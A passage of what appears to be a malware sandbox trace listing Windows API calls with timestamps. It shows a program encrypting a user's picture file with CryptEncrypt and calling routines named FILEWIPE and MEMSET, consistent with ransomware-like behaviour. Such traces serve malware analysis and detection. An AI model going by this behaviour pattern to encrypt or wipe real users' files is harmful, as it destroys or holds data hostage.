lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.622] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0189.622] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.623] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.623] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa5f008*, pdwDataLen=0x87e820*=0xa5d9, dwBufLen=0xa5e0 | out: pbData=0xa5f008*, pdwDataLen=0x87e820*=0xa5e0) returned 1 [0189.623] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.623] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0189.623] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.625] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.625] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.625] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.625] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0189.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0189.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.625] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.625] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0189.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.625] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.625] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0189.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0189.625] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.625] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0189.625] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0189.625] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0189.625] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0189.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0189.625] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.630] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.630] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0189.630] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.634] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.634] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.634] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0189.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0189.634] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0189.634] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0189.634] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0189.634] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.634] CryptDestroyKey (hKey=0x90af18) returned 1 [0189.635] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0189.635] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0189.635] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0189.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0189.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0189.635] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0189.635] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0189.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0189.635] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0189.635] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0189.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0189.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0189.635] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0189.635] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0189.635] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0189.635] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0189.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0189.635] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0189.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0189.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0189.635] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0189.635] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0189.636] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.636] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0189.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0189.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0189.636] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.636] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0189.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0189.636] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.636] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0189.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0189.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0189.636] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.636] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0189.636] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0189.636] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.636] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0189.636] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0189.636] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0189.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0189.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0189.637] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0189.637] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.637] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0189.637] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.637] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0189.637] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0189.637] FreeLibrary (hLibModule=0x74f20000) returned 1 [0189.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0189.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0189.637] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0189.637] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0189.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0189.637] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.637] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.638] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.639] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.639] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0189.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0189.639] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0189.639] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.639] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.642] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.gif", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49f47ce0, ftCreationTime.dwHighDateTime=0x1d5d9c2, ftLastAccessTime.dwLowDateTime=0xe8598c0, ftLastAccessTime.dwHighDateTime=0x1d5e321, ftLastWriteTime.dwLowDateTime=0xe8598c0, ftLastWriteTime.dwHighDateTime=0x1d5e321, nFileSizeHigh=0x0, nFileSizeLow=0xa5d9, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="P8P2Fux.gif", cAlternateFileName="")) returned 0x90af58 [0189.642] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0189.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0189.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0189.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0189.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.643] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.643] CharLowerBuffW (in: lpsz="byte[42457]", cchLength=0xb | out: lpsz="byte[42457]") returned 0xb [0189.643] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.643] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0189.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0189.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.643] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.643] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0189.643] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0189.643] FreeLibrary (hLibModule=0x75c90000) returned 1 [0189.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0189.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0189.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0189.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0189.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0189.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0189.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0189.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0189.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0189.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0189.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0189.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0189.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0189.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0189.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0189.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0189.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0189.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0189.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0189.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0189.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0189.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0189.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0189.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0189.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0189.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0189.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0189.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0189.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0189.644] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.644] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.644] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0189.644] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0189.644] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.644] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.644] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.644] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.644] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.645] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.645] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.645] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.645] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.645] PeekMessageW (in: 